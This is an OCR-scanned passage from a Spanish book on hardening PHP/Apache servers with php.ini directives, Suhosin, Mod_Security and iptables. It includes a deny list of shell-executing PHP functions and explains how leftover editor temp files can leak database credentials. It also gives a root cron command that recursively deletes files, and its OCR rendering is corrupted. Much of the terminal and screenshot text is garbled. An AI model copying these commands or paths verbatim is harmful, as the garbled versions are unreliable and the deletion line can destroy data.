Last login: Mon Jun 24 03:05:42 ART 2013 on ttyl 

elcone to Ubuntu 12.04.2 LTS (GMU-L inux 3.5.0-32-generic 1686) 


”= Documentation https he lp. ubuntu com 


Systen information as of Mon Jun 24 03:10:17 ART 2013 


System load 0.01 Processes: 72 
Usage of 27.1: of 6.89GB Users logged in 0 


Memory usage: 6 IP address for eth0: 192,168.0.105 


wap usage 0 
Graph this data and manage thi :ysten at http landscape. .canonical.com 


:heyB8u shey:7S sudo find nane php.ini 
sudo] passuord for shey 
vetesphp5/cli/php. ini 
etcsphp5/apacheZ/php. ini 

:heyRus hey S yy 


Figura 2. Buscamos el archivo de configuración php. ¡ini en Ubuntu Server, 


Deshabilitar funciones 

Una vez localizado el php.ini, lo abrimos con cualquier editor de 
texto y usamos el buscador para encontrar la directiva disable _ functions 
(la cual debe ser aplicada para deshabilitar todas las funciones PHP 
que puedan envolver algún peligro en nuestro servidor). Aparecerá 
declarada pero sin valores asignados. Si no está, la agregamos 
manualmente. Haremos una primera prueba deshabilitando phpinfo, 
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que, como hemos visto, proporciona muchísima información sobre 
el servidor, que no deseamos en manos de un atacante. 
Modificamos la directiva de la siguiente manera: 


disable _functions= “phpinfo” 


Cada vez que realizamos un cambio sobre un archivo de 
configuración, como php.ini, tenemos que reiniciar el servidor. Luego 


debemos programar un script que llame a phpinfo para verificar si ha 
sido deshabilitado correctamente. 


<?php 
print phpinfoO); 
2> 


Como podemos ver en la Figura 3, obtenemos un mensaje de error 


que indica claramente que la función phpinfo() ha sido deshabilitada por 
razones de seguridad. 


per =T2 Tb LO mr pr e Meter + STBTU 
ONDAS ys hrrinen has laos foo Cntbicci - 4 en 

4 Ence 15] Pp AD E AT EAT LT 
O búuabio» de Caio Y Cut [Y Sucomos HE braga UD iticcametinos E itarallccrannr L Criticas Y ios Hr] 

e Time Momary ¡Functino MS 

0.0034 16300| ¡mane pto «Mambo 
T A 
2 0.0021 1616 iptgad( acupt pá? 


Figura 3. A la izquierda se encuentra el mensaje de error; a la derecha, 
el archivo php. ini con la directiva disable_functions. 
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De esta manera podemos deshabilitar fácilmente todas las 
funciones PHP peligrosas que, a esta altura de la obra, ya podemos 
identificar. Veamos un ejemplo de cómo podría quedar declarada la 
directiva disable_functions: 


disable_functions = “phpinfo, php_uname, system, exec, passthru, shell_exec, 
eval, show_source, popen, proc_open, proc_close, ini_set, ini_alter, ini_get_all, 
ini_restore, openlog, syslog, ftp_connect, ftp_exec, ftp_get, ftp_login” 


Lógicamente, si una de esas funciones es utilizada por la aplicación 
web no podremos deshabilitarla. En ese caso, aplicaremos lo aprendido 
en capítulos anteriores para protegernos. 


Poner un límite CON OPEN_BASEDIR 
Mediante la directiva open_basedir podemos NEUTRALIZAMOS LA 

indicarle a PHP que tiene permisos únicamente 

sobre los archivos que estén dentro de un VULNERABILIDAD 

directorio específico y evitar, así, la vulnerabilidad DIRECTORY 

de Directory Transversal, donde un atacante 

navega a través de los directorios de nuestro TRANSVERSAL 


servidor explotando una aplicación con dicha 

falla. Por ejemplo, en Ubuntu Server podemos > » 
declarar la directiva open_basedir = “/var/www/”, mientras que en Windows 
declaramos: open_basedir = “c:iwamplwww”. De este modo, cuando un 

script intente abrir o acceder a un archivo (por ejemplo mediante la 


función fopen() o include()) se verificará su ubicación. Si se encuentra 
fuera del directorio permitido, PHP se negará a interactuar con él. 


DN EL BLINDADO OXIDADO 


El modo seguro de PHP o safe_mode fue, en su momento, un intento de resolver el problema de 
seguridad existente en servidores compartidos, pero dicha función quedó obsoleta desde la versión 
5.3.0 de PHP. En internet podemos encontrar muchísimos exploits para saltar su protección, en 


los servidores que aún cuenten con ella. 
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Figura 4. A la izquierda, el error que generó open_basedir; 
a la derecha, el archivo php. ¡ni con la directiva aplicada. 


Prohibido subir archivos 


Si nuestra aplicación web no brinda servicios para almacenar 
archivos o imágenes online, podemos deshabilitar completamente 
la subida de archivos a través del protocolo HTTP, obteniendo una 


dl Compte php ares Ll gra im - Metepade > 
va 


Sra medida más de protección contra 


A posibles ataques. 

IF ES z Buscaremos la directiva file_uploads 
Pe naa rn guion opti CLA PA ss co en el archivo php.ini y cambiaremos 
ESTARSE su valor de la siguiente manera: file_ 
AN uploads = Off. 

| 
pe eses Figura 5. La subida de archivos 
mu ems E al servidor mediante http queda 
o A = / deshabilitada. 
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Para completar la edición del archivo php.ini deberemos deshabilitar 
la inclusión de archivos, tal como aprendimos en el Capítulo 6, 
buscando las directivas allow_url_fopen y allow_url_include. Por último, 
podemos apagar los mensajes de error, como vimos en el Capítulo 8, 
mediante display_errors dentro del php.ini. 


Archivos temporales 


Los archivos temporales son creados por programas que necesitan 
guardar determinados datos por un momento, o 
bien como respaldo de información para aquellos ES IMPORTANTE 
ar dan la posIpmiada al Aena de retroceder BORRAR LOS 
acciones (por ejemplo, un editor de texto). A 
simple vista, no tienen nada perjudicial, pero ARCHIVOS 
si no se borran "1688 de ser utilizados puegEn TEMPORALES CON 
generar una brecha importante de seguridad. 

Los sistemas Linux son más propensos a este INFORMACIÓN 
REO de SO pueden E ogni con SENSIBLE 
más facilidad si se está usando un CMS (Sistema 
de Administración de Contenidos), como Joomla. 7 y 

Imaginemos la siguiente situación: un administrador abre un script 
PHP llamado configuration.php que contiene los datos de conexión al 
DBMS (asi se denomina el archivo de configuración de Joomla, aunque 
podría tratarse de cualquier otro con información sensible), con el 
editor de texto o aplicación para programar. El editor genera un archivo 
temporal como respaldo en caso de que el administrador quiera 
recuperar una acción anterior. Al terminar de editar el script, el archivo 
temporal permanece, sin ser eliminado, bajo el nombre de configuration. 
php- (el símbolo - al final del nombre indica, en los sistemas Linux, que 
se trata de un documento temporal). 


D FIREWALL ZONE ALARM 


Zone Alarm es una alternativa de firewall pensada para Windows. La empresa que lo desarrolla se llama 
Check Point y ofrece una versión gratis, más dos versiones pagas con características y funcionalidades 


adicionales. El sitio web oficial es www.zonealarm.com. 
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Joomla! Developer Network 


There is abways a great deal of Joomia' development activity underway and 7 Fatnara ta 
communicating with other developers ín the community is essential This site is a 
resource for anyone looking to buld or maintain software based on the Joomla 
platform 


Where to Start 


Resources 


Figura 6. Joomla es un CMS open source. Podemos colaborar 
auditando su código y reportando los bugs a los desarrolladores. 


¿Cómo puede, entonces, un atacante aprovecharse del archivo 
temporal configuration.php-? Si el script 
está alojado en la misma carpeta que la 


LOS SISTEMAS aplicación o sitio web, al intentar acceder a 

LINUX SON MÁS través del navegador mediante www.sitio. 
com/configuration.php solo se verá la 

VULNERABLES A UN página en blanco. En cambio, si se intenta 


ATAQUE POR ARCHIVOS acceder al archivo temporal www.sitio.com/ 


configuration.php- es posible visualizar 
TEMPORALES todo su contenido en texto plano, ya que el 
intérprete de PHP no lo ejecutará como un 
q ho script propio del lenguaje. También del lado 
del atacante, si el sitio es vulnerable a LFI se puede aprovechar 


"444 


AR ARCHIVOS TEMPORALES 


Dependiendo del sistema operativo y/o la aplicación, podemos encontrar los archivos temporales bajo 
diferentes extensiones. Una es el nombre del archivo seguido del símbolo -, utilizado comúnmente en 


Linux. Pero también podemos encontrar extensiones .BAK y .OLD, entre otras. 
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dicha falla para buscar archivos temporales que pudieran contener 
información sensible. 

Para solucionar el problema, y volviendo al punto de vista del 
administrador, podemos crear una tarea programada en el servidor 
para eliminar diariamente todos los documentos temporales. 

Por ejemplo, editando el archivo que se encuentra en /etc/crontab 
y añadiendo lo siguiente: 


HEliminar todos los dias a las 00:00hs los archivos temporales 
00***rm-R /var/www/*,*- 


n [7] 
crontab (/etc) - gedit 


FI "TE 


crontab M 


/fetc/crontab: system-wide crontab 

Unlike any other crontab you don't have to run the crontab* 
command to install the new version when you edit this file 

and files in /etc/cron.d. These files also have username fields, 
that none of the other crontabs do. 


*. o. | 


SHELL=/bin/sh 
PATH=/usr/Llocal/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 


Y m h dom mon dow user command 


17 » vv root cd / 6 run-parts --report /etc/cron.hourly 

256 ...  poot test -x /usr/sbinyanacron || ( cd / 65 run-parts --report /etc/cron.daily ) 

436 . + 7 root test -x /usr/sbin/anacron || ( cd / 66 run-parts --report /etc/cron.weekly ) 
52 6 Lo.» root test -x /usr/sbin/anacron || ( cd / 65 run-parts --report /etc/cron.monthly ) 


' 


seliminar todos los días a las 80:6Bhs los archivos temporales 
00-*+* + rm-R /var/wm/*.*-| 


Figura 7. Tarea programada para que se ejecute 
todos los días y elimine los archivos temporales. 


D SISTEMAS DE PREVENCIÓN DE INTRUSOS 
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Los Sistemas de Prevención de Intrusos (IPS), a diferencia de los IDS, intentarán responder a posibles ata- 


ques descartando o anulando los paquetes maliciosos. Su funcionamiento se asemeja a un firewall, con la 


diferencia de que los IPS no solo tienen en cuenta las cabeceras de un paquete sino también su contenido. 
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Seguridad extra 


Luego de comprender y reforzar medidas de protección 
básicas, podemos ir un poco más allá en lo que respecta a seguridad. 
Conoceremos sistemas y módulos especiales para hardening, tales 
como Suhosin y Mod _Security, que nos ayudarán a combatir los 
ataques que pudiera sufrir nuestro servidor web. 


Hardening con Suhosin 


Se trata de un sistema de protección avanzado para instalaciones 
PHP, diseñado para proteger servidores y usuarios de los defectos 
conocidos y desconocidos en aplicaciones PHP y el núcleo de este 
lenguaje. Suhosin se compone de dos partes independientes, que 
pueden ser utilizadas por separado o en combinación. La primera 
es un pequeño parche para el núcleo de PHP, que implementa algunas 
protecciones de bajo nivel contra Buffer Overflows y otras 
vulnerabilidades. La segunda es una poderosa extensión de PHP 
que implementa todas las otras protecciones. 


EH narasnea pro projeer 


tome  Jmador  Coctad 
Aboutus News Subosin Hardening patch Sevcses Advisones Forum Donate 
| You are on: Home | Guhosio 


Suhosin 


What is Suhosin? A ] A 


Subosia la an advancod 3. Jeri MIN 
yA Le Al protecbon pyutem for PHP Copvriah 
=” inatallationa. It was designed to protact servers and users from 
¡A mown and unknown Aawa in PHP appliicationa and the PHP core 
Suhosin comes in two independent parts, that can be used 
soparatoly or nm combination, The hreot part 16 4 small patch agamot Una PHP coro, that mplamente a faw 


low-level protec bons agams! bufferoverflows or format string vulnerables and the second part ma 
powerful PHP axtanalor that implamente all the other protection 


Unliko tho DPP mardornnmg-Patch Subose ls binary compatible to normal PHP installation, which maans it 
w compatible to 3rd party bunary extension hka ZandOptimzar . h 


Download 


The Suhosin patches and the extension ara avalabla for download on cur download pago, 


Figura 8. Suhosin es un excelente sistema 
para hardening en servidores web que utilizan PHP. 
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Instalación de Suhosin 
Si bien podemos instalar Suhosin en distribuciones Debian y 
derivadas con un simple comando (apt-get install php5-suhosin), también 
es posible instalar dicho sistema desde el código fuente utilizando 
nuestro Ubuntu Server. Para hacerlo, primero descargamos el código 
fuente de Suhosin mediante el wget. 
Ejemplo: wget http://download.suhosin.org/suhosin-0.9.33.tgz. 
sheyBus-shey: "9 uget http://download .suhosin.org/suhosin-0.9.33.tgz 
-2013-06-28 03:40:19—  http://douwnload .suhosin.org/suhosin-0.9.33.tgz 
Resolviendo download .suhosin.org (download .suhosin.org)... 85.214.93.8 
conectando con download .suhosin.org (download .suhosin.org)[85.214.93.81:80... e 
nectado. 
Petición HTTP enviada, esperando respuesta... 200 OK 
Longitud: 104488 (10ZK) [lapplicationsx-tgz l 


irabando a: Esuhosin-0.9.33.tgza 


48,9K/s en Z,1s 


Figura 9. El comando wget descargará 
el código fuente de Suhosin. 


Al descomprimir el archivo descargado, tar -xvpzf suhosin-0.9.33. 
tgz, nos movemos al nuevo directorio, cd suhosin-0.9,33, y ejecutamos 
el comando ./configure seguido de make y make install. 

A continuación, abrimos el archivo php.ini mediante el comando 
nano /etc/php5/apache2/php.ini e introducimos al final la siguiente línea: 
extension=/usr/lib/php5/20090626+Ifs/suhosin.so. 


| - DOCUMENTACIÓN DE SUHOSIN 


En el sitio oficial de Suhosin (www.hardened-php.net/suhosin) podemos encontrar un FAQ y documen- 
tación para instalar, actualizar y configurar Suhosin (www.hardened-php.net/suhosin/configuration. 


html). También encontramos los enlaces de descarga. Todo el contenido del sitio está en idioma inglés. 
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GNU nano 2.2.6 Archivo: /etc/php5/apache2/php.ini Modificado 


Figura 10. Esta ubicación que agregamos al php.ini 
se detalla en la instalación de Suhosin. 


Reiniciamos el servidor ejecutamos el comando php -i | grep suhosin 


para comprobar que Suhosin se ha instalado correctamente. 


uhos 
suho 
suho 

uho 


uho 


unos 


suhos 


uho 


uhos 


suho 


suho 


suhos 


uhos 


uho 
suho 


suhos 


suho 
uho 
uho 


suho 


TS 


unos 


uho 


.request .max_array_index_length => 64 => 64 
¿request .max_totalname_length => 256 => 256 
request .max_value_length => 1000000 => 1000000 
¿,hax_varname_length => 64 => 641 
.max_vars => 1000 => 1000 
¿.Server.encode => Un => On 
«server. strip => On => On 
.Checkraddr => 0 => 0 


,cryptdocroot => On => On 

,Ccryptkey => [ protected 1] => [ protected 1 
.Cryptraddr => 0 => 0 

.cryptua => Off => Off 


,.encrypt => On => On 

, ,»max_id_length => 128 => 128 

imulation => Off => Off 
.sg1.bailout_on_error => Off => Off 
.sq1.comment => 0 => 0 
sql.multiselect => 0 => 0 
sql.opencomment => 0 => 0 
.sq1.union => 0 => 0 
.sql.user_postfix => no value => no value 
.sql.user_prefix => no value => no value 
.srand .ignore => On => On 
.Sstealth => On => On 


Figura 11. Si todo se realizó correctamente, 
veremos una pantalla como esta. 


Suhosin mejora en gran medida la seguridad de nuestro 


servidor web. Una vez instalado, contamos con protección para 
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vulnerabilidades tipo Buffer Overflow en el núcleo de PHP, cifrado 

de cookies, funciones peligrosas deshabilitadas, protección sobre los 
identificadores de sesión, características de filtrado de datos, etcétera. 
Todo se puede modificar y adaptar a nuestras necesidades. 


Firewall de aplicaciones web 


Los firewalls tradicionales trabajan sobre la capa de red y transporte, 
analizando el tráfico dirigido hacia el sistema que protegen, con el 
fin de detectar un acceso no autorizado y bloquearlo. Los servidores 
web deben dejar el puerto 80 abierto y permitir el acceso a todos los 
usuarios que deseen ver el sitio, por lo cual un firewall tradicional no 
puede bloquearlo ni aportar ningún tipo de protección a la aplicación. 

A partir de este problema surgieron los firewalls de aplicaciones 
web (WAF) con características especiales, adaptadas a la protección que 
requiere un servidor web. Por ejemplo, mientras un firewall tradicional 
tiene reglas para mantener un puerto cerrado, uno de aplicaciones web 
tiene reglas para detectar ataques tipo Cross-Site Scripting o Inyección 
SQL. La diferencia es clara: los WAF no bloquearán el puerto 80, pero sí 
analizarán las transacciones HTTP para proteger al servidor web. 


Instalación de Mod_Security 

Mod_Security es un firewall de aplicaciones web que se ejecuta 
como módulo del servidor Apache. Contiene reglas que permiten 
detectar y filtrar ataques comunes contra una aplicación web (como 
XSS, Inyección SOL, DDoS). Una de sus principales características es 
la capacidad de capturar y analizar dinámicamente el tráfico HTTP 
generado por los clientes. Se encargará de permitir las peticiones 
legítimas y bloquear aquellas que probablemente no lo sean. 


D DOCUMENTACIÓN SOBRE MOD_SECURITY 


Mod_Security es un módulo para Apache muy conocido. Podemos encontrar numerosa documenta- 
ción en internet acerca de las mejores configuraciones que podemos aplicarle. Su sitio oficial (www. 


modsecurity.org) cuenta con documentación y zona para desarrolladores. 
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Neves and Updates damuas 


Avsilabifity of Mod 5ecurty 2.74 Stable 


Keen 

(May 27. 2419) Litrgt Art Atte Cart 

Tha ModSecunty Developerent Tean is plessed to Attempts for Plesk Vuineratility 
A 
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this release. please check CVE-20"3-276£ wr more Cacticostios 


Figura 12. Mod_Security es un firewall de aplicaciones 
web open source que posee reglas para 
protegernos de los ataques más frecuentes. 


Para instalar Mod_Security desde el código fuente debemos 
descargar la última versión disponible en el sitio oficial de 
ModSecurity: wget https://www.modsecurity.org/tarball/2.7.4/modsecurity- 
apache_2.7.4.tar.gz. 

A continuación, descomprimimos el archivo descargado: 
tar zxvf modsecurity-apache_2.7.4.tar.gz, y nos movemos al 
nuevo directorio: cd modsecurity-apache_2.7.4. 

Luego instalamos las dependencias: apt-get install liblua5.1-0 lua5.1 
apache2-threaded-dev build-essential libxmI2 libxmI2-dev libcurl3 libcurl3-dev 
y ejecutamos ./configure, seguido de make y make install. 

Debemos crear el archivo /etc/apache2/mods-available/mod_security2.1load 
con el siguiente contenido: 


LoadFile /usr/lib/i386-linux-gnu/libxml2.so 
LoadFile /usr/lib/i386-linux-gnu/liblua5.1.s0.0 
LoadModule security2 module /usr/lib/apache2/modules/mod_security2.so. 
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GNU nano 2.2.6 Archivo: ...pacheZ2/mods-enabled/mod_securityZ.load 


LoadFile /usr/1ib/1386-1 inux-qnu/ 1ibxm1Z.so 
LoadFile /usr/1ib/i386-1inux-gnu/liblua5.1.s0.0 
LoadModule securityZ_module /usr/lib/apacheZ/modules/mod_securityZ.so 


[ 3 líneas escritas ] 


Figura 13. Creamos el archivo /etc/apache2/ 
mods-available/mod_security2.load. 


Una vez creado el archivo debemos habilitar los módulos a utilizar, 
ejecutando los comandos: a2enmod mod_security2 y a2enmod unique_id. 

Por último, nos movemos al directorio donde descargamos el web 
firewall Mod_Security y ejecutamos el comando cp modsecurity.conf- 
recommended /etc/apache2/conf.d/modsecurity.conf. 

Una vez instalado Mod_Security, podemos verificar si cometimos 
errores de sintaxis mediante el comando apache2ctl configtest. Si se nos 
responde syntax OK hemos realizado todos los pasos correctamente; 
de lo contrario, se mostrará un mensaje de error con la línea que 
escribimos mal. Reiniciamos el servidor y comprobamos que Mod_ 
Security verdaderamente se esté ejecutando, revisando los logs de 
Apache: tail /var/log/apache2/error.log. Si todo salió bien visualizaremos 
unas líneas similares a las siguientes: 


[Fri Jun 28 06:54:43 2013] [notice] ModSecurity for Apache/2.7.4 (http:// 
www.modsecurity.org/) configured. 

[Fri Jun 28 07:30:55 20131 [notice] ModSecurity: APR compiled ver- 
sion="1.4.6”; loaded version="1.4.6" 
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[Fri Jun 28 07:30:55 20131] [notice] ModSecurity: PCRE compiled 
version="8.12"; loaded version="8.12 2011-01-15“(...). 


neyBus-shey:/9 sudo apacheZcti configtest 
apacheZ: Could not reliably deternine the server's fully qualified domain nane, 
¡sing 127.0,1.1 for ServerNane 
uyntax OK 
heyBus-shey:/S sudo /etc/init.drapacheZ restart 
= Restarting ueb server apacheZ 
Could not reliably determine the server's fully qualificd domain nane, 
7.0.1.1 for SeruerNane 
waiting apacheZ: Could not reliably determine the server's fully qualified 
lomain nane, using 127,0.1,1 for ServerName 
[ OK 1 
:hey0u shey:/S tail suar/ log apacheZ/error. log 
[Fri Jun 28 06:54:43 2013] [notice] Apache/2.2.22 (Ubuntu) PHP/5.3.,10-1lubuntu3.f 
with Suhosin-Patch conf igured resuning normal operation 
[Fri Jun 28 07:30:53 2013] [notice] caught SIGTERM, shutting down 
[Fri Jun 28 07:30:55 2013] [notice] ModSecurity for Apache/2.7.4 (http WI, MOÉ 
ecurity.org/) conf iqured 
[Fri Jun 28 07:30:55 2013] [notice] ModSecurity: APR compiled version="1.4.6”; 1 
yaded version="1.4.6" 
[Fri Jun 28 07:30:55 2013] [noticel ModSecurity: PCRE compiled version="B,12 ” 
loaded version="8.12 2011-01-15” 
[Fri Jun 28 07:30:55 20131 [notice] ModSecurity: LUA compiled version="Lua 5 
[Fri Jun 28 07:30:55 20131 [notice] ModSecurity: LIBXML compiled version="2.7.8 
[Fri Jun 28 07:30:56 2013] [notice] Apaches2.2.22 (Ubuntu) PHP/5.3.10-1lubuntu3.f 


with Suhosin-Patch conf igured resuning normal operations 


Figura 14. Instalamos el web firewall Mod_Security 
en nuestro servidor web Linux con Apache2. 


Implementar iptables 


Si bien conocimos e instalamos un firewall específico para 
aplicaciones web, no está de más aprender a instalar un firewall 
tradicional. Podemos necesitar proteger servidores con componentes 
tan sensibles como una base de datos, para lo cual podemor utilizar 
el conocido firewall en sistemas Linux: iptables. 

Nuestro objetivo es mantener abiertos solamente los puertos 
que son necesarios y permitir conexiones únicamente a aquellos 
dispositivos autorizados (los cuales, probablemente, estén en la 
misma intranet del servidor). 

Mediante iptables podremos crear las reglas de filtrado que 
resultan necesarias para proteger nuestro servidor y minimizar el 
impacto de un ataque. 


»  Wwww.redusers.com www.detodoprogramacion.com 


WEB HACKING PZA 305 


ER neta / tales prrpact homepage - Th. | de ! 
€: melitas 101 


mame O 


T-1- [> EN 


The netfilter.org project 
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Sofware inside vs tramework enables packet itening. network adoyess jand port] translation (NAJPTT) and other packet 
successor of the presous Lin 2.2 x pchamrs and Linux 2.0 x fado systems. 


netíter is a set ol hooks insade he Linux kernel hal allows kemel modules to regester calback lunchons ath lhe network stack 


back tor every packet that raverses he respective hook wiltkn tha network stack 


iptables 5 a genere table strucasO for the definibon of náesets Each rule wttun an IP table cons=3ts of a number of ciassibers 
(Iptables target) 


nelítor p_tables, connachon trackung (p_comirack, rí_comtrack) and he NAT subsystem together bud the major parts al 


Main Features 


Figura 15. Netfilter es el proyecto 
que desarrolla el firewall iptables. 


Instalación de iptables 


Para descargar e instalar la última versión disponible de iptables 
dentro de nuestro servidor, lo que primero debemos hacer es crear 
un nuevo directorio: mkdir /usr/src/iptables, y movernos a este para 
descargar iptables: wget http://www.netfilter.org/projects/iptables/files/ 
iptables-1.4,19.1.tar.bz2. 

A continuación, descomprimimos el archivo descargado: 
tar xvíj iptables-1.4.19.1.tar.bz2, y nos dirigimos al nuevo directorio 
extraído: cd iptables-1.4.19.1. 


D FIREWALL EN WINDOWS 


El firewall de Windows puede adaptar la protección para diversos entornos de red. Los perfiles 
utilizados son: hogar, trabajo y público. Independientemente del nivel de protección que posean 
los perfiles, podremos pasar de uno a otro con facilidad. En el sitio http: //windows.microsoft. 
com/es-xl/windows7 /understanding-windows-firewall-settings encontramos documentación 
para configurarlo. 
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Para compilar iptables utilizamos los parámetros ./configure KERNEL _ 
DIR=/usr/src/iptables y make KERNEL_DIR=/usr/src/iptables. 


h presence 
limuxrnag ic .h ye 
linmoxsproc_fs.h usability 


linmwxproc_fs.h presence no 


for limxsproc_fs.h no 
ize of struct 1p6_hdr 10 
j for pkg-conf 1g usr/binspkg-conf ig 

pkg-config is at least version 0.9.0 
ecking for libnfnet!link no 
onf igure reating config. statu 
onf ig ata creating Makefíle 
onf ig nt ( ating extens lons/GMUmakef ile 
onf ig ate ating includeMakefi le 
onf ig atus 
onfig. statu 
onfig.stata cre w libipqMakef 
onf ig ati creating libipq/libipq.pe 
onf ig ati creating libiptcMakefíle 
onf ig ati rating libiptcslibipte 
onf ig ata € rting libiptes1ibiptte 
onf ig ata creating líibiptcslibipóte. pe 
onf ig at .ating libxtablesMakef ile 
onf ig ati creating utilsMakef ile 
onfig.stati creating includesxtables-vers ion .h 
onf ig tati creating includesiptable interna l!.h 
onf ig ata ( ating confíg.h 
onf íg ata confíg.h 1 unchanged 
onf ig ata executing depfiles command 


onfig. stats executing líbtoo! command 


Figura 16. Compilación del firewall iptables. 


Instalamos iptables con el siguiente comando: make install KERNEL 
DIR=/usr/src/iptables. 


Procedemos a guardar las rutas antiguas: 


cd /shin mv iptables iptables.bak 
mv iptables-restore iptables-restore.bak 
mv iptables-save iptables-save.bak. 


N/ ¿TE RESULTA ÚTIL? 


Lo que estás leyendo es el fruto del trabajo de cientos de personas que ponen todo de sí para lograr un mejor 


producto. Utilizar versiones "pirata" desalienta la inversión y da lugar a publicaciones de menor calidad. 
NO ATENTES CONTRA LA LECTURA. NO ATENT ES CONTRA Yi. COMPRA SÓLO PRODUCTOS IES, 


Nuestras publicaciones se comercialzan en kios > supe se mternet 
(usershop.redusers.com). Si tienes alguna duda co 0 0 quie rás s contactamos por medio hop Ordus ers.com 
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Vinculamos las nuevas rutas: 


In -s /usr/local/sbin/iptables iptables 
In -s /usr/local/sbin/iptables-restore iptables-restore 
In -s /usr/local/sbin/iptables-save iptables-save. 


meybBus-shey:/3 : n =s /usr/local,s ] > cables 
sheyBus-shey:/S sudo ln -s /usr/local/sbin/iptables-restore iptables—-restore 


:heyBus-shey:/S sudo ln -s /usr/local/sbin/iptables-save iptables-save 
sheyBus-shey:/9 _ 


Figura 17. Al concluir tenemos la última versión 
disponible de iptables en funcionamiento. 


Podemos comprobar que la última versión de iptables está 
fucionando con un simple comando: iptables -V, que nos informará 
la versión del firewall que está corriendo nuestro sistema operativo. 
Para ver la ayuda ejecutaremos iptables --help. 

De acuerdo con las reglas que definamos manualmente, el firewall 
permitirá o denegará los paquetes que entran y salen del sistema. 
Por ejemplo, una regla puede indicar que únicamente se le permite 
al equipo con IP 192.168.0.103 acceder por el puerto 22 al servidor, 
de modo tal que todas las máquinas con diferente dirección IP que 
intenten conectarse al puerto 22 del servidor sean rechazadas. 

Los comandos y parámetros básicos de iptables son: 


e -A: Añade reglas (INPUT, OUTPUT o FORWARD). 


e -F: Elimina reglas. 
e -L: Muestra todas las reglas. 
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e -j: Define qué hacer con el paquete (ACCEPT, DROP o REJECT). 
e -s: Indica la IP de la máquina origen de un paquete. 

e -d: Indica la IP de la máquina destino de un paquete. 

e -i: Indica el nombre de la interfaz de red. 

e -p: Indica el protocolo IP del paquete. 


Para las reglas sobre protocolos TCP y UDP hay otros dos parámetros: 


e --sport: Indica el puerto origen del paquete. 
e --dport: Indica el puerto destino del paquete. 


Las reglas INPUT definen qué hacer con las conexiones entrantes, 
y OUTPUT, cómo actuar ante salientes. Las reglas FORWARD aplican para 
las conexiones que se reenvíen. 

Las posibles acciones son: 


e ACCEPT: Aceptar paquetes. 
e DROP: Eliminar paquetes. 
e REJECT: Responder al origen que el paquete que envía no puede pasar. 


shey0us-shey: Y sudo iptables -Y 
iptables v1.4,19,1 
shey0us-shey:79 sudo iptables -L 
hain INPUT (policy ACCEPT) 
target prot opt source destination 


ha in FORMARD (policy ACCEPT) 
target prot opt source destination 


hain OUTPUT (policy ACCEPT) 


target prot opt source destination 
shey0us-shey:7S 
sheytu hey:7S E 


Figura 18. Firewall iptables en funcionamiento 
dentro de nuestro servidor Linux. 


Antes de crear reglas, podemos definir las políticas por defecto para 
iptables. Si un paquete no cumple con ninguna de las reglas definidas 
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manualmente, se utilizarán las políticas por defecto. Una buena 
elección sería definirlas de la siguiente manera: 


+Politicas por defecto. 
iptables -P INPUT DROP 
iptables -P OUTPUT DROP 
iptables -P FORWARD DROP 


De este modo, todos los paquetes (INPUT, OUTPUT y FORWARD) 
que no cumplan con las reglas definidas serán eliminados. 

Para crear una regla que rechace absolutamente todas las conexiones 
entrantes al sistema, la sintaxis sería la siguiente: iptables -A INPUT -j 
DROP. Para permitir todas las conexiones salientes, sería: iptables -A 
OUTPUT -¡ACCEPT. 

Lo cierto es que aplicar solo estas dos reglas sirve de poco. En las 
próximas secciones aprenderemos a crear reglas realmente útiles. Si 
bien cada sistema o servidor tiene sus propias necesidades, que hay 
que adaptar según el caso, aprenderemos todo lo necesario para saber 
elaborar las reglas precisas en cada situación que se presente. 


Reglas útiles 


El orden de las reglas es importante. Si un paquete no cumple la 
primera pasará a la siguiente, y así sucesivamente, hasta encontrar 
una que cumpla con el criterio definido o llegar a la última. 

La primera regla que podemos definir, si se trata de un servidor web, 
es permitir las conexiones entrantes por el puerto 80: 


H+Definimos que el puerto 80 (TCP) acepta conexiones. 
iptables -A INPUT -p tcp —-dport 80 -¡ ACCEPT 


En algunas oportunidades, puede ocurrir que administremos el 
servidor mediante SSH desde otro equipo de la intranet. 

El primer paso será fijarnos qué dirección IP tiene la máquina 
que necesita el acceso al servidor (por ejemplo, 192.168.0.102). 
Luego creamos una regla que permita conexiones entrantes, por 
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el puerto que escojamos, únicamente a la IP autorizada. Según el 
servicio que utilicemos para realzar la conexión, aplicaremos la regla 
correspondiente; en el caso de SSH, sería: 


HtPermitimos a la IP 192.168.0.102 conectarse al servidor por SSH. 
iptables -A INPUT -s 192.168.0.102 -p tcp --dport 22 -¡ ACCEPT 


Del mismo modo, podemos definir una regla que permita a un FTP 
con diferente IP (como 192.168.0.105) conectarse al servidor para subir 
O bajar archivos: 


HtPermitimos a un FTP con IP 192.168.0.105 conectarse al servidor. 
iptables -A INPUT -s 192.168.0.105 -p tcp --dport 21 -¡ ACCEPT 


Bien puede suceder también que las máquinas autorizadas a acceder 
al servidor se encuentren fuera de la red local. 

En ese caso, podemos definir reglas que acepten paquetes desde una 
determinada IP pública (por ejemplo, 235.34.104.11). 


HtPermitimos a la IP 235.34.104.11 conectarse al servidor por el puerto 3306. 
iptables -A INPUT -s 235.34.104.11 -p tcp --dport 3306 -¡ACCEPT 


Luego de definir qué máquinas pueden acceder al servidor y 
mediante qué puertos, añadimos dos reglas para denegar todas las 
demás conexiones entrantes por TCP y UDP: 


HRechazamos todas las demás conexiones entrantes por TCP y UDP. 
iptables -A INPUT -p tcp --dport 1:65535 -j DROP 
iptables -A INPUT -p udp --dport 1:65535 -j DROP 


Es importante no olvidar definir estas dos reglas al final, ya que 
de encontrarse al principio ninguna máquina —ni siquiera la que está 
autorizada- podría enviar paquetes al servidor. 
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iptables — -áport 60 -] ALTE 
5 sudo iptables -A INPUT -s Z.168.0.102 -p tcp dport 22 -¡ 


sheyBus-shey: Y sudo iptables INPUT —-s Z.168.0.102 —p tcp —dport 23 - j 

EPT 

:heyBus-shey:"9 sudo iptables —A INPUT -s .168.0.105 —p tcp —dport 21 -j 

EPT 

sheyBus-shey:7$ sudo iptables INPUT -s 235.34.104.11 -p tcp dport 3306 

CCEPT 

sheyBus-shey:”$ sudo iptables INPUT tcp —dport 1:65535 -j DROP 

:heyBus-shey:7"$ sudo iptables -A INPUT udp dport 1:65535 -j DROP 

sheyBus-shey:"$ sudo iptables 

Chain INPUT (policy ACCEPT) 

target prot opt source destination 

ICCEPT tcp - anyuhere anyuhere -p dpt:http 
tcp — 19Z.168.0.102 anyuhere dpt :ssh 
tcp 192 .168.0.102 anyuhere p dpt:telnet 
tcp 192.168.0,105 anyuhere -p dpt:ftp 
